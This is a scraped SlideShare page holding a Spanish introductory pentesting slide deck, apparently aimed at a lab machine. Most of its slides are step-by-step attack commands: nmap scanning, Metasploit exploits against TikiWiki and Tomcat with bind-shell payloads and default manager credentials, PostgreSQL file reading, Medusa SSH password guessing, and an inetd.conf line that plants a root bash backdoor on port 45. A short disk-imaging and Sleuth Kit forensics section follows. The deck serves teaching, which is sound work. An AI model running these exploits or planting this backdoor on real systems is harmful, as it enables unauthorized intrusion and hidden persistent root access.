SlideShare una empresa de Scribd logo
1 de 15
PENTEST
Una pequeña mirada al mundo del hackin
Por que quiero ser un super
hacker?
Seguridad Informatica
● No hay un sistema 100% seguro.
● A parte de que es una ilusión hoy veremos que
tan complicado puede ser tomar el control de
un servidor.
Primeras técnicas de penetración
● Under desk password and over screen
password
NMAP
● #descubriendo nodos en la red
● nmap –sP 192.168.1.0/24
● #descubriendo servicios en el server
● nmap –sV 192.168.1.X (versiones de
programas)
● -O
Mmm interesante tiene un servidor
web, que vive ahí???
● Descubrimiento de directorios en el servidor
web
● # cd /pentest/web/dirbuster/
● # java –jar DirBuster-0.12.jar
● escribimos el target, seleccionamos un archivo
de directorio y listo le ponemos start
Un servicio de portal, veamos que
podemos hacer...
●
# cd /pentest/exploits/framework3/
●
msf> search tikiwiki
●
msf> use auxiliary/admin/tikiwiki/tikidblib
●
msf auxiliary(tikidblib) > show options
●
● msf auxiliary(tikidblib) > set RHOST 192.168.1.X
● > exploit
● msf> use exploits/unix/webapp/tikiwiki_graph_formula_exec
● msf> show options
●
> set RHOST 192.168.229.129
● > show payloads
● > set PAYLOAD generic/shell_bind_tcp
Bien ahora es el turno de tomcat
● http://ip:8180
●
● msf> search tomcat
●
● msf> use auxiliary/scanner/http/tomcat_mrg_login
●
● set RHOSTS 192.168.229.129
●
● set RPORT 8180
●
Y eso para que me sirve tomcat 2
● #como ya podemos accesar al manager corremos otro
exploit
● msf > use exploits/multi/http/tomcat_mgr_deploy
● set USERNAME tomcat
● set PASSWORD tomcat
● set RPORT 8180
● set RHOST 192.168.229.129
● set PAYLOAD linux/x86/shell_bind_tcp
● exploit
Y postgres tendrá algo que decir??
● search postgres
● msf > use auxiliary/scanner/postgres/postgres_login
● set RHOSTS IP
● run
● # bien funciona ahora usemos un exploit que nos permite crear una tabla para poder
leer archivos del server.
● msf > use auxiliary/admin/postgres/postgres_readfile
● show options
● set RHOSTS ip
● set PASSWORD pass
● set archivo a leer
● run
Y el SSH apa
● #Medusa VNC, http, SMB, Telnet, FTP, SSH, etc.
● -h <HOST>: Dirección IP objetivo.
● -u < USUARIO>: Usuario objetivo. En este caso, msfadmin.
● -M <MODULO>: Módulo de ejecución en medusa. En este caso usaremos ssh.
● -e <n/s/ns>: Permite la comprobación de usuarios sin contraseña (n), Passwords
iguales que el nombre del usuario (s), o ambas (ns). Usaremos el valor ‘ns’.
● # medusa -h 192.168.1.74 -u msfadmin -M ssh -e ns
● # veamos si nuestro usuario puede hacerse root
● sudo -i
Te veo a la vuelta, pero seguro
regreso
● #nos aseguramos que en el archivo /etc/services tengamos el
servicio mpm con el puerto 45
● mpm 45/tcp
● #ahora agregamos una linea a la configuracion de xinetd en el
archivo /etc/inetd.conf
● mpm stream tcp root /bin/bash bash -i
● # y reiniciamos el servicio de xinetd, probamos con telnet y con
nmap
Aun me queda tiempo, bien veamos
un poco de analisis forense
● Ejecutemos netcat en el server en el que
haremos la investigacion para poder recibir la
copia del server
● nc -l 9000 > driveimage.dd
● Obtenemos una copia del SO.
● dd if=/dev/hda1 bs=2k | nc 192.168.1.X 9000
Sleuth kit
● Con estas herramientas podremos ver que
había en nuestro Disco.
● fls -f ext -m / -r driveimage.dd > datos-salida
● ils -f ext -m driveimage.dd >> datos-salida}
● mactime -b datos-salida yyyy-mm-dd..yyyy-
mm-dd > informe-actividad.yyyy
● icat -s -f ext driveimage.dd inodo
Gracias
● @cgsomera
● somera@tuxteno.com

Más contenido relacionado

La actualidad más candente

Clase 1 introducción a symfony 2
Clase 1   introducción a symfony 2Clase 1   introducción a symfony 2
Clase 1 introducción a symfony 2
hydras_cs
 
Criptografia
CriptografiaCriptografia
Criptografia
javipiris
 
Clientes ligeros y Servidores NX
Clientes ligeros y Servidores NXClientes ligeros y Servidores NX
Clientes ligeros y Servidores NX
Rosariio92
 
Practica nas andrei
Practica nas andreiPractica nas andrei
Practica nas andrei
cfgmi
 

La actualidad más candente (20)

Instalación de Servidores GNU/Linux - PROXY SQUID (parte 3)
Instalación de Servidores GNU/Linux - PROXY SQUID (parte 3)Instalación de Servidores GNU/Linux - PROXY SQUID (parte 3)
Instalación de Servidores GNU/Linux - PROXY SQUID (parte 3)
 
Configuracion del servidor http en centos 7
Configuracion del servidor http en centos 7Configuracion del servidor http en centos 7
Configuracion del servidor http en centos 7
 
Configurar dns
Configurar dnsConfigurar dns
Configurar dns
 
Como crear un_tunel_entre_dos_pc recomendado
Como crear un_tunel_entre_dos_pc recomendadoComo crear un_tunel_entre_dos_pc recomendado
Como crear un_tunel_entre_dos_pc recomendado
 
Clase 1 introducción a symfony 2
Clase 1   introducción a symfony 2Clase 1   introducción a symfony 2
Clase 1 introducción a symfony 2
 
Manual de uso_de_squid
Manual de uso_de_squidManual de uso_de_squid
Manual de uso_de_squid
 
Administrar mi página web desde un cliente ftp
Administrar mi página web desde un cliente ftpAdministrar mi página web desde un cliente ftp
Administrar mi página web desde un cliente ftp
 
Squid
Squid Squid
Squid
 
0 entorno php
0 entorno php0 entorno php
0 entorno php
 
ssh en centos 7
ssh en centos 7ssh en centos 7
ssh en centos 7
 
Servidor ftp en centos 7
Servidor ftp en centos 7Servidor ftp en centos 7
Servidor ftp en centos 7
 
Criptografia
CriptografiaCriptografia
Criptografia
 
Entorno PHP
Entorno PHPEntorno PHP
Entorno PHP
 
Clientes ligeros y Servidores NX
Clientes ligeros y Servidores NXClientes ligeros y Servidores NX
Clientes ligeros y Servidores NX
 
TScrack: Brute Force Remote Desktop
TScrack: Brute Force Remote DesktopTScrack: Brute Force Remote Desktop
TScrack: Brute Force Remote Desktop
 
Anonimo el libro hacker
Anonimo   el libro hackerAnonimo   el libro hacker
Anonimo el libro hacker
 
Proxy Squid en Ubuntu
Proxy Squid en UbuntuProxy Squid en Ubuntu
Proxy Squid en Ubuntu
 
Practica nas andrei
Practica nas andreiPractica nas andrei
Practica nas andrei
 
Instalar git, github, node js, quasar
Instalar git, github, node js, quasarInstalar git, github, node js, quasar
Instalar git, github, node js, quasar
 
Fail2 ban
Fail2 banFail2 ban
Fail2 ban
 

Destacado

Objectifs vendeur extrait
Objectifs vendeur extraitObjectifs vendeur extrait
Objectifs vendeur extrait
Philippe Babut
 
E82 zafac010 _application-io pt fif module__v5-0__de_en_fr
E82 zafac010 _application-io pt fif module__v5-0__de_en_frE82 zafac010 _application-io pt fif module__v5-0__de_en_fr
E82 zafac010 _application-io pt fif module__v5-0__de_en_fr
Charles Santos
 
Yungan geovanny 6_s_ti_2
Yungan geovanny 6_s_ti_2Yungan geovanny 6_s_ti_2
Yungan geovanny 6_s_ti_2
GeovannyYungan
 
Vanessa singaña excel
Vanessa singaña excelVanessa singaña excel
Vanessa singaña excel
vane01si
 

Destacado (20)

deber base de datsos sql
deber base de datsos sqldeber base de datsos sql
deber base de datsos sql
 
Singaña vanessa caracteristicas del computador
Singaña vanessa caracteristicas del computadorSingaña vanessa caracteristicas del computador
Singaña vanessa caracteristicas del computador
 
Guía del participante(musicoterapia para reducir la ansiedad matemática)
Guía del participante(musicoterapia para reducir la ansiedad matemática)Guía del participante(musicoterapia para reducir la ansiedad matemática)
Guía del participante(musicoterapia para reducir la ansiedad matemática)
 
Objectifs vendeur extrait
Objectifs vendeur extraitObjectifs vendeur extrait
Objectifs vendeur extrait
 
Presentación lonjas
Presentación lonjasPresentación lonjas
Presentación lonjas
 
Zertifizierungen 1
Zertifizierungen 1Zertifizierungen 1
Zertifizierungen 1
 
First B Summer 1912
First B Summer 1912First B Summer 1912
First B Summer 1912
 
Herramientas para crear y compartir
Herramientas para crear y compartir Herramientas para crear y compartir
Herramientas para crear y compartir
 
E82 zafac010 _application-io pt fif module__v5-0__de_en_fr
E82 zafac010 _application-io pt fif module__v5-0__de_en_frE82 zafac010 _application-io pt fif module__v5-0__de_en_fr
E82 zafac010 _application-io pt fif module__v5-0__de_en_fr
 
Ciclo del nitrógeno
Ciclo del nitrógeno Ciclo del nitrógeno
Ciclo del nitrógeno
 
Eleccions
EleccionsEleccions
Eleccions
 
Presentación logistica
Presentación logisticaPresentación logistica
Presentación logistica
 
Actividad4
Actividad4Actividad4
Actividad4
 
Ejercicio importante word
Ejercicio importante wordEjercicio importante word
Ejercicio importante word
 
Psicología
PsicologíaPsicología
Psicología
 
Yungan geovanny 6_s_ti_2
Yungan geovanny 6_s_ti_2Yungan geovanny 6_s_ti_2
Yungan geovanny 6_s_ti_2
 
Vanessa singaña excel
Vanessa singaña excelVanessa singaña excel
Vanessa singaña excel
 
Ecosistema
EcosistemaEcosistema
Ecosistema
 
Werning, Die oekonomische Durchdringung der digitalen (Medien-)Kultur
Werning, Die oekonomische Durchdringung der digitalen (Medien-)KulturWerning, Die oekonomische Durchdringung der digitalen (Medien-)Kultur
Werning, Die oekonomische Durchdringung der digitalen (Medien-)Kultur
 
Foros TeresaValdez
Foros TeresaValdezForos TeresaValdez
Foros TeresaValdez
 

Similar a Pentesting Basico

Vip genial fantastico 23 pags imprimir clase 64498987-uso-de-la-herramienta-nmap
Vip genial fantastico 23 pags imprimir clase 64498987-uso-de-la-herramienta-nmapVip genial fantastico 23 pags imprimir clase 64498987-uso-de-la-herramienta-nmap
Vip genial fantastico 23 pags imprimir clase 64498987-uso-de-la-herramienta-nmap
xavazquez
 
Servidores cent os final
Servidores cent os finalServidores cent os final
Servidores cent os final
Steven Restrepo
 

Similar a Pentesting Basico (20)

Proyecto 7
Proyecto 7Proyecto 7
Proyecto 7
 
Rooted2020 virtual pwned-network_-_manel_molina
Rooted2020 virtual pwned-network_-_manel_molinaRooted2020 virtual pwned-network_-_manel_molina
Rooted2020 virtual pwned-network_-_manel_molina
 
Proyecto 7
Proyecto 7Proyecto 7
Proyecto 7
 
Snort 2006
Snort 2006Snort 2006
Snort 2006
 
Advanced and comprehensive use of nmap
Advanced and comprehensive use of nmapAdvanced and comprehensive use of nmap
Advanced and comprehensive use of nmap
 
Proyecto 7 - Seguridad Activa: Control de Redes
Proyecto 7 - Seguridad Activa: Control de RedesProyecto 7 - Seguridad Activa: Control de Redes
Proyecto 7 - Seguridad Activa: Control de Redes
 
Curso nmap
Curso nmapCurso nmap
Curso nmap
 
Curso nmap
Curso nmapCurso nmap
Curso nmap
 
Laboratorio "monitoreo con Pandora fms 2.0"
Laboratorio "monitoreo con Pandora  fms 2.0"Laboratorio "monitoreo con Pandora  fms 2.0"
Laboratorio "monitoreo con Pandora fms 2.0"
 
Clusters Beowulf
Clusters BeowulfClusters Beowulf
Clusters Beowulf
 
Samba ubuntu11_10_12 04_slide
Samba ubuntu11_10_12 04_slideSamba ubuntu11_10_12 04_slide
Samba ubuntu11_10_12 04_slide
 
Vip genial fantastico 23 pags imprimir clase 64498987-uso-de-la-herramienta-nmap
Vip genial fantastico 23 pags imprimir clase 64498987-uso-de-la-herramienta-nmapVip genial fantastico 23 pags imprimir clase 64498987-uso-de-la-herramienta-nmap
Vip genial fantastico 23 pags imprimir clase 64498987-uso-de-la-herramienta-nmap
 
Servidores cent os final
Servidores cent os finalServidores cent os final
Servidores cent os final
 
Clase6 (consola linux)
Clase6 (consola linux)Clase6 (consola linux)
Clase6 (consola linux)
 
Taller de seguridad para servidores GNU/Linux (GSICKMinds)
Taller de seguridad para servidores GNU/Linux (GSICKMinds)Taller de seguridad para servidores GNU/Linux (GSICKMinds)
Taller de seguridad para servidores GNU/Linux (GSICKMinds)
 
Mrtg ubuntu
Mrtg ubuntuMrtg ubuntu
Mrtg ubuntu
 
Creacion de un IPS utilizando Linux y hardware Soekris
Creacion de un IPS utilizando Linux y hardware SoekrisCreacion de un IPS utilizando Linux y hardware Soekris
Creacion de un IPS utilizando Linux y hardware Soekris
 
Taller Kali Linux3: Rastreando Informacion y Objetivos -HackMadrid ene13
Taller Kali Linux3: Rastreando Informacion y Objetivos -HackMadrid ene13Taller Kali Linux3: Rastreando Informacion y Objetivos -HackMadrid ene13
Taller Kali Linux3: Rastreando Informacion y Objetivos -HackMadrid ene13
 
Nagios
NagiosNagios
Nagios
 
Nmap
NmapNmap
Nmap
 

Último

6°_GRADO_-_MAYO_06 para sexto grado de primaria
6°_GRADO_-_MAYO_06 para sexto grado de primaria6°_GRADO_-_MAYO_06 para sexto grado de primaria
6°_GRADO_-_MAYO_06 para sexto grado de primaria
Wilian24
 
TEMA 14.DERIVACIONES ECONÓMICAS, SOCIALES Y POLÍTICAS DEL PROCESO DE INTEGRAC...
TEMA 14.DERIVACIONES ECONÓMICAS, SOCIALES Y POLÍTICAS DEL PROCESO DE INTEGRAC...TEMA 14.DERIVACIONES ECONÓMICAS, SOCIALES Y POLÍTICAS DEL PROCESO DE INTEGRAC...
TEMA 14.DERIVACIONES ECONÓMICAS, SOCIALES Y POLÍTICAS DEL PROCESO DE INTEGRAC...
jlorentemartos
 

Último (20)

6°_GRADO_-_MAYO_06 para sexto grado de primaria
6°_GRADO_-_MAYO_06 para sexto grado de primaria6°_GRADO_-_MAYO_06 para sexto grado de primaria
6°_GRADO_-_MAYO_06 para sexto grado de primaria
 
Supuestos_prácticos_funciones.docx
Supuestos_prácticos_funciones.docxSupuestos_prácticos_funciones.docx
Supuestos_prácticos_funciones.docx
 
LA LITERATURA DEL BARROCO 2023-2024pptx.pptx
LA LITERATURA DEL BARROCO 2023-2024pptx.pptxLA LITERATURA DEL BARROCO 2023-2024pptx.pptx
LA LITERATURA DEL BARROCO 2023-2024pptx.pptx
 
origen y desarrollo del ensayo literario
origen y desarrollo del ensayo literarioorigen y desarrollo del ensayo literario
origen y desarrollo del ensayo literario
 
Feliz Día de la Madre - 5 de Mayo, 2024.pdf
Feliz Día de la Madre - 5 de Mayo, 2024.pdfFeliz Día de la Madre - 5 de Mayo, 2024.pdf
Feliz Día de la Madre - 5 de Mayo, 2024.pdf
 
Power Point: Fe contra todo pronóstico.pptx
Power Point: Fe contra todo pronóstico.pptxPower Point: Fe contra todo pronóstico.pptx
Power Point: Fe contra todo pronóstico.pptx
 
SESION DE PERSONAL SOCIAL. La convivencia en familia 22-04-24 -.doc
SESION DE PERSONAL SOCIAL.  La convivencia en familia 22-04-24  -.docSESION DE PERSONAL SOCIAL.  La convivencia en familia 22-04-24  -.doc
SESION DE PERSONAL SOCIAL. La convivencia en familia 22-04-24 -.doc
 
Prueba de evaluación Geografía e Historia Comunidad de Madrid 2º de la ESO
Prueba de evaluación Geografía e Historia Comunidad de Madrid 2º de la ESOPrueba de evaluación Geografía e Historia Comunidad de Madrid 2º de la ESO
Prueba de evaluación Geografía e Historia Comunidad de Madrid 2º de la ESO
 
Diapositivas de animales reptiles secundaria
Diapositivas de animales reptiles secundariaDiapositivas de animales reptiles secundaria
Diapositivas de animales reptiles secundaria
 
Procedimientos para la planificación en los Centros Educativos tipo V ( multi...
Procedimientos para la planificación en los Centros Educativos tipo V ( multi...Procedimientos para la planificación en los Centros Educativos tipo V ( multi...
Procedimientos para la planificación en los Centros Educativos tipo V ( multi...
 
Prueba libre de Geografía para obtención título Bachillerato - 2024
Prueba libre de Geografía para obtención título Bachillerato - 2024Prueba libre de Geografía para obtención título Bachillerato - 2024
Prueba libre de Geografía para obtención título Bachillerato - 2024
 
SISTEMA RESPIRATORIO PARA NIÑOS PRIMARIA
SISTEMA RESPIRATORIO PARA NIÑOS PRIMARIASISTEMA RESPIRATORIO PARA NIÑOS PRIMARIA
SISTEMA RESPIRATORIO PARA NIÑOS PRIMARIA
 
Tema 17. Biología de los microorganismos 2024
Tema 17. Biología de los microorganismos 2024Tema 17. Biología de los microorganismos 2024
Tema 17. Biología de los microorganismos 2024
 
TIENDAS MASS MINIMARKET ESTUDIO DE MERCADO
TIENDAS MASS MINIMARKET ESTUDIO DE MERCADOTIENDAS MASS MINIMARKET ESTUDIO DE MERCADO
TIENDAS MASS MINIMARKET ESTUDIO DE MERCADO
 
Los avatares para el juego dramático en entornos virtuales
Los avatares para el juego dramático en entornos virtualesLos avatares para el juego dramático en entornos virtuales
Los avatares para el juego dramático en entornos virtuales
 
TEMA 14.DERIVACIONES ECONÓMICAS, SOCIALES Y POLÍTICAS DEL PROCESO DE INTEGRAC...
TEMA 14.DERIVACIONES ECONÓMICAS, SOCIALES Y POLÍTICAS DEL PROCESO DE INTEGRAC...TEMA 14.DERIVACIONES ECONÓMICAS, SOCIALES Y POLÍTICAS DEL PROCESO DE INTEGRAC...
TEMA 14.DERIVACIONES ECONÓMICAS, SOCIALES Y POLÍTICAS DEL PROCESO DE INTEGRAC...
 
Biografía de Charles Coulomb física .pdf
Biografía de Charles Coulomb física .pdfBiografía de Charles Coulomb física .pdf
Biografía de Charles Coulomb física .pdf
 
Tema 11. Dinámica de la hidrosfera 2024
Tema 11.  Dinámica de la hidrosfera 2024Tema 11.  Dinámica de la hidrosfera 2024
Tema 11. Dinámica de la hidrosfera 2024
 
EL HABITO DEL AHORRO en tu idea emprendedora22-04-24.pptx
EL HABITO DEL AHORRO en tu idea emprendedora22-04-24.pptxEL HABITO DEL AHORRO en tu idea emprendedora22-04-24.pptx
EL HABITO DEL AHORRO en tu idea emprendedora22-04-24.pptx
 
OCTAVO SEGUNDO PERIODO. EMPRENDIEMIENTO VS
OCTAVO SEGUNDO PERIODO. EMPRENDIEMIENTO VSOCTAVO SEGUNDO PERIODO. EMPRENDIEMIENTO VS
OCTAVO SEGUNDO PERIODO. EMPRENDIEMIENTO VS
 

Pentesting Basico

  • 1. PENTEST Una pequeña mirada al mundo del hackin
  • 2. Por que quiero ser un super hacker?
  • 3. Seguridad Informatica ● No hay un sistema 100% seguro. ● A parte de que es una ilusión hoy veremos que tan complicado puede ser tomar el control de un servidor.
  • 4. Primeras técnicas de penetración ● Under desk password and over screen password
  • 5. NMAP ● #descubriendo nodos en la red ● nmap –sP 192.168.1.0/24 ● #descubriendo servicios en el server ● nmap –sV 192.168.1.X (versiones de programas) ● -O
  • 6. Mmm interesante tiene un servidor web, que vive ahí??? ● Descubrimiento de directorios en el servidor web ● # cd /pentest/web/dirbuster/ ● # java –jar DirBuster-0.12.jar ● escribimos el target, seleccionamos un archivo de directorio y listo le ponemos start
  • 7. Un servicio de portal, veamos que podemos hacer... ● # cd /pentest/exploits/framework3/ ● msf> search tikiwiki ● msf> use auxiliary/admin/tikiwiki/tikidblib ● msf auxiliary(tikidblib) > show options ● ● msf auxiliary(tikidblib) > set RHOST 192.168.1.X ● > exploit ● msf> use exploits/unix/webapp/tikiwiki_graph_formula_exec ● msf> show options ● > set RHOST 192.168.229.129 ● > show payloads ● > set PAYLOAD generic/shell_bind_tcp
  • 8. Bien ahora es el turno de tomcat ● http://ip:8180 ● ● msf> search tomcat ● ● msf> use auxiliary/scanner/http/tomcat_mrg_login ● ● set RHOSTS 192.168.229.129 ● ● set RPORT 8180 ●
  • 9. Y eso para que me sirve tomcat 2 ● #como ya podemos accesar al manager corremos otro exploit ● msf > use exploits/multi/http/tomcat_mgr_deploy ● set USERNAME tomcat ● set PASSWORD tomcat ● set RPORT 8180 ● set RHOST 192.168.229.129 ● set PAYLOAD linux/x86/shell_bind_tcp ● exploit
  • 10. Y postgres tendrá algo que decir?? ● search postgres ● msf > use auxiliary/scanner/postgres/postgres_login ● set RHOSTS IP ● run ● # bien funciona ahora usemos un exploit que nos permite crear una tabla para poder leer archivos del server. ● msf > use auxiliary/admin/postgres/postgres_readfile ● show options ● set RHOSTS ip ● set PASSWORD pass ● set archivo a leer ● run
  • 11. Y el SSH apa ● #Medusa VNC, http, SMB, Telnet, FTP, SSH, etc. ● -h <HOST>: Dirección IP objetivo. ● -u < USUARIO>: Usuario objetivo. En este caso, msfadmin. ● -M <MODULO>: Módulo de ejecución en medusa. En este caso usaremos ssh. ● -e <n/s/ns>: Permite la comprobación de usuarios sin contraseña (n), Passwords iguales que el nombre del usuario (s), o ambas (ns). Usaremos el valor ‘ns’. ● # medusa -h 192.168.1.74 -u msfadmin -M ssh -e ns ● # veamos si nuestro usuario puede hacerse root ● sudo -i
  • 12. Te veo a la vuelta, pero seguro regreso ● #nos aseguramos que en el archivo /etc/services tengamos el servicio mpm con el puerto 45 ● mpm 45/tcp ● #ahora agregamos una linea a la configuracion de xinetd en el archivo /etc/inetd.conf ● mpm stream tcp root /bin/bash bash -i ● # y reiniciamos el servicio de xinetd, probamos con telnet y con nmap
  • 13. Aun me queda tiempo, bien veamos un poco de analisis forense ● Ejecutemos netcat en el server en el que haremos la investigacion para poder recibir la copia del server ● nc -l 9000 > driveimage.dd ● Obtenemos una copia del SO. ● dd if=/dev/hda1 bs=2k | nc 192.168.1.X 9000
  • 14. Sleuth kit ● Con estas herramientas podremos ver que había en nuestro Disco. ● fls -f ext -m / -r driveimage.dd > datos-salida ● ils -f ext -m driveimage.dd >> datos-salida} ● mactime -b datos-salida yyyy-mm-dd..yyyy- mm-dd > informe-actividad.yyyy ● icat -s -f ext driveimage.dd inodo